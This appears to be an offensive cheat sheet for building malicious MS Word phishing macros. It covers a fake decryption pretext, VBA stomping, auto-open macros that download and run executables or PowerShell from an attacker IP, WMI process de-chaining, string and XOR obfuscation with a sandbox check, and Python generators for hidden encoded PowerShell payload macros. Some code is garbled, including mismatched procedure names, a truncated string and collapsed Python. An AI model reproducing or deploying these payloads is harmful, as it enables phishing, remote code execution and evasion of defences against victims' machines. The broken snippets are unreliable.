Place "encrypted" data in a Word document after the pretext (random base64): head -c 2K < /dev/urandom > rnd && base64 rnd.
Create an AutoText: Insert > Quick Parts > AutoTexts > Save Selection as DecryptedBody to AutoText Gallery.
Create a macro to "decrypt" the body with readable content according to the phishing legend.
DecryptPage.vba
Sub Document_Open()
DecryptPage
End Sub
Sub AutoOpen()
DecryptPage
End Sub
Sub DecryptPage()
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.AttachedTemplate.AutoTextEntries("DecryptedBody").Insert Where:=Selection.Range, RichText:=True
End Sub
VBA Stomping
Manually
Create a .doc file with a malicious VBA macro.
Open it with FlexHEX: File > Open > OLE Compound File.
Open Macros > VBA > NewMacros file.
Locate the Attribute VB_Name ASCII string (starts with \x41\x74\x74...) and replace all the bytes with zeros till the end of the file: Edit > Insert Zero Block.
Save the .doc and exit.
Now the VBA source code is wiped and execution of macro will be performed via the P-code (if the victim's MS Word is the same).
After the macro is executed this way MS Word will decompile the P-code and put the VBA source code back into the NewMacros file, so it will reappear in the VBA editor as well.
Sub Document_Open()
Hello
End Sub
Sub AutoOpen()
Hello
End Sub
Sub Hello()
MsgBox ("Hello, World!")
End Sub
VBA Macros
Wait till a malicious binary is downloaded with PowerShell and execute it:
fakecode.vba
Sub Document_Open()
hShellcodeRunner
End Sub
Sub AutoOpen()
hShellcodeRunner
End Sub
Sub DownloadWaitExec()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://10.10.13.37/evil.exe', 'evil.exe')"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + "\evil.exe"
Wait (2)
Shell exePath, vbHide
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
De-chain PowerShell process from MS Word parent process via WMI:
StageWMI.vba
Sub Evil
Dim strArg As String
strArg = "powershell -exec bypass -nop -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/run.txt')"
GetObject("winmgmts:").Get("Win32_Process").Create strArg, Null, Null, pid
End Sub
Function Pony(flowers)
Pony = StrReverse(flowers)
End Function
Sub Evil
Dim strArg As String
strArg = Pony(")'txt.nur/73.31.01.01//:ptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(XEI c- pon- ssapyb cexe- llehsrewop")
GetObject(Pony(":stmgmniw")).Get(Pony("ssecorP_23niW")).Create strArg, Null, Null, pid
End Sub
Obfuscate it using xor encryption and add heuristics detection check based on comparing the .doc name with current window name via ActiveDocument.Name:
XORStageWMI.vba
Function Pears(beets)
Pears = Chr(beets Xor Asc("a"))
End Function
Function Strawberries(grapes)
Strawberries = Left(grapes, 3)
End Function
Function Almonds(jelly)
Almonds = Right(jelly, Len(jelly) - 3)
End Function
Function Nuts(milk)
Do
Oatmilk = Oatmilk + Pears(Strawberries(milk))
milk = Almonds(milk)
Loop While Len(milk) > 0
Nuts = Oatmilk
End Function
Function Evil()
If ActiveDocument.Name <> Nuts("016022004079005014002") Then
Exit Function
End If
Dim Apples As String
Dim Water As String
Apples = "31.." _
& "33.." _
& "33.." _
& "37.."
Water = Nuts(Apples)
GetObject(Nuts("022008015012006012021018091")).Get(Nuts("054008015082083062049019014002004018018")).Create Water, Tea, Coffee, Napkin
End Function
Sub Document_Open()
Evil
End Sub
Sub AutoOpen()
Evil
End Sub
Helpers
Generate a ready-to-paste malicios MS Word macro (execution is provided by VBA Shell function):
gen_doc_autoopen_payload_vbshell.py
#!/usr/bin/env python3# -*- coding: utf-8 -*-import sysfrom base64 import b64encodefrom argparse import ArgumentParserparser =ArgumentParser()parser.add_argument('pwsh_file', help='PowerShell script to execute')parser.add_argument('--chunk-size', type=int, default=200, help='length of a payload chunk line') # if less for big payloads, Windows can error out about "too many line continuations"
args = parser.parse_args()defgen_payload_vbshell(pwsh_file,chunk_size):withopen(pwsh_file, 'r', encoding='utf-8')as f: payload = f.read() payload = payload.encode('utf-16le') payload =b64encode(payload).decode() payload = [payload[i:i + chunk_size]for i inrange(0, len(payload), chunk_size)] payload = [f'"{chunk}"'for chunk in payload] payload =' _\r\n& '.join(payload) payload =f"""\ Sub AutoOpen()\r Evil\r End Sub\r\r Sub Document_Open()\r Evil\r End Sub\r\r Sub Evil()\r Text = "powershell -exec bypass -nop -nologo -w hidden -enc " _\r & {payload}\r a = Shell(Text, vbHide)\r End Sub\ """.replace('\t', '')return payloadif__name__=='__main__':print(gen_payload_vbshell(args.pwsh_file, args.chunk_size))
Generate a ready-to-paste malicios MS Word macro (execution is provided by WScript.Shell):
gen_doc_autoopen_payload_wscript_shell.py
#!/usr/bin/env python3# -*- coding: utf-8 -*-import sysfrom base64 import b64encodefrom argparse import ArgumentParserparser =ArgumentParser()parser.add_argument('pwsh_file', help='PowerShell script to execute')parser.add_argument('--chunk-size', type=int, default=50, help='length of a payload chunk line')args = parser.parse_args()defgen_payload_wscript_shell(pwsh_file,chunk_size):withopen(pwsh_file, 'r', encoding='utf-8')as f: chunks = f.read() chunks = chunks.encode('utf-16le') chunks =b64encode(chunks).decode() chunks = [chunks[i:i+chunk_size]for i inrange(0, len(chunks), chunk_size)] chunks = [f'"{chunk}"'for chunk in chunks]print('Sub AutoOpen()\r')print(' Evil\r')print('End Sub\r\n')print('Sub Document_Open()\r')print(' Evil\r')print('End Sub\r\n')print('Sub Evil()\r')print(' Dim Text As String\r')print(' Text = "powershell -exec bypass -nop -nologo -w hidden -enc "\r')for chunk in chunks:print(f' Text = Text + {chunk}\r')print(' CreateObject("WScript.Shell").Run Text\r')print('End Sub')if__name__=='__main__':print(gen_payload_wscript_shell(args.pwsh_file, args.chunk_size))
